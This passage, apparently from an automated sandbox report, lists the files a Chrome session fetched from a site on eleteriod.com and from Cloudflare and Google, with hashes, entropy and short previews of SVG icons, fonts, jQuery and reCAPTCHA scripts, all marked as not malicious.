                          File Type:SVG Scalable Vector Graphics image
                          Category:dropped
                          Size (bytes):1864
                          Entropy (8bit):5.222032823730197
                          Encrypted:false
                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                          MD5:BC3D32A696895F78C19DF6C717586A5D
                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                          Malicious:false
                          Reputation:low
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:downloaded
                          Size (bytes):2905
                          Entropy (8bit):3.962263100945339
                          Encrypted:false
                          SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                          MD5:FE87496CC7A44412F7893A72099C120A
                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:low
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:dropped
                          Size (bytes):268
                          Entropy (8bit):5.111190711619041
                          Encrypted:false
                          SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                          MD5:59759B80E24A89C8CD029B14700E646D
                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                          Malicious:false
                          Reputation:low
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                          Category:downloaded
                          Size (bytes):35970
                          Entropy (8bit):7.989503040923577
                          Encrypted:false
                          SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                          MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                          SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                          SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                          SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/12BUrMGJQ5OOdz78ji9Tn5uQop50
                          Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (1238)
                          Category:downloaded
                          Size (bytes):1239
                          Entropy (8bit):5.068464054671174
                          Encrypted:false
                          SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                          MD5:9E8F56E8E1806253BA01A95CFC3D392C
                          SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                          SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                          SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                          Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):727
                          Entropy (8bit):7.573165690842521
                          Encrypted:false
                          SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                          MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                          SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                          SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                          SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140
                          Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                          Category:downloaded
                          Size (bytes):28000
                          Entropy (8bit):7.99335735457429
                          Encrypted:true
                          SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                          MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                          SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                          SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                          SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/pq0hAI7qxScx87yzfXwx40
                          Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 71 x 70, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):61
                          Entropy (8bit):4.035372245524405
                          Encrypted:false
                          SSDEEP:3:yionv//thPl2BtS7Yikxl/k4E08up:6v/lhPoOkik7Tp
                          MD5:7AA175EDC91F7CBEA141492499C382B2
                          SHA1:CE04496062D269F7B226454C0A6BF58B05078DCD
                          SHA-256:3B442EE32806360F5210224E1A5CE6C27D1C6A6866859A7B65BEA2FFB4CE5CBD
                          SHA-512:F840A6D77E6A392B9F09BCFD2017DEE20996B93F1EC1292F4C77AE344DF3C856EE95B5E4BC394E01A4A715725472399468788A6E9DD3A114D2EC2FC354BBD32C
                          Malicious:false
                          Reputation:low
                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887dff9f6d8f429d/1716393414081/67D-SWS4mqjGPWf
                          Preview:.PNG........IHDR...G...F.............IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1414), with no line terminators
                          Category:downloaded
                          Size (bytes):1414
                          Entropy (8bit):5.778716403292963
                          Encrypted:false
                          SSDEEP:24:2jkm94/zKPccAv+KVC4TLv138EgFB5vtTGJrdcl/1t4glvllLtd1ATw1HsLqo40Y:VKEctKomR3evtTA2tX7TGw1MLrwUnG
                          MD5:40CFAE3B5462CABE5C2CFAFA279227CB
                          SHA1:56CD07648D373760809DBF9515F6E5376DFF04A4
                          SHA-256:CD22C5327CD617FB47A47DF6E46DD055B0B5A4775D22B394B5968284D2CFFE91
                          SHA-512:E0911068E87AFAD83F2943CBFF005B146641C1F5D81E24B13C6E3ECF7CC24D2E1329F8C19DB73AD69AE9EB62B263BF2143D297221EC0452B76527BAF6770BB75
                          Malicious:false
                          Reputation:low
                          URL:https://www.google.com/recaptcha/api.js
                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.pr
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:dropped
                          Size (bytes):2905
                          Entropy (8bit):3.962263100945339
                          Encrypted:false
                          SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                          MD5:FE87496CC7A44412F7893A72099C120A
                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                          Malicious:false
                          Reputation:low
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:downloaded
                          Size (bytes):1864
                          Entropy (8bit):5.222032823730197
                          Encrypted:false
                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                          MD5:BC3D32A696895F78C19DF6C717586A5D
                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv220
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):231
                          Entropy (8bit):6.725074433303473
                          Encrypted:false
                          SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                          MD5:547988BAC5584B4608466D761E16F370
                          SHA1:C11BB71049702528402A31027F200184910A7E23
                          SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                          SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130
                          Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):70712
                          Entropy (8bit):6.94130504124589
                          Encrypted:false
                          SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                          MD5:F70FF06D19498D80B130EC78176FD3FF
                          SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                          SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                          SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256
                          Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:downloaded
                          Size (bytes):268
                          Entropy (8bit):5.111190711619041
                          Encrypted:false
                          SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                          MD5:59759B80E24A89C8CD029B14700E646D
                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 71 x 70, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):61
                          Entropy (8bit):4.035372245524405
                          Encrypted:false
                          SSDEEP:3:yionv//thPl2BtS7Yikxl/k4E08up:6v/lhPoOkik7Tp
                          MD5:7AA175EDC91F7CBEA141492499C382B2
                          SHA1:CE04496062D269F7B226454C0A6BF58B05078DCD
                          SHA-256:3B442EE32806360F5210224E1A5CE6C27D1C6A6866859A7B65BEA2FFB4CE5CBD
                          SHA-512:F840A6D77E6A392B9F09BCFD2017DEE20996B93F1EC1292F4C77AE344DF3C856EE95B5E4BC394E01A4A715725472399468788A6E9DD3A114D2EC2FC354BBD32C
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR...G...F.............IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):61
                          Entropy (8bit):3.990210155325004
                          Encrypted:false
                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                          Malicious:false
                          Reputation:low
                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):76
                          Entropy (8bit):4.631455882779888
                          Encrypted:false
                          SSDEEP:3:xPW1skF0NuiQMnumOPIOAyP2MR:xPWmJumOPzAo2C
                          MD5:55D6D0CAE462E2BC690BC8AF45985B15
                          SHA1:0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
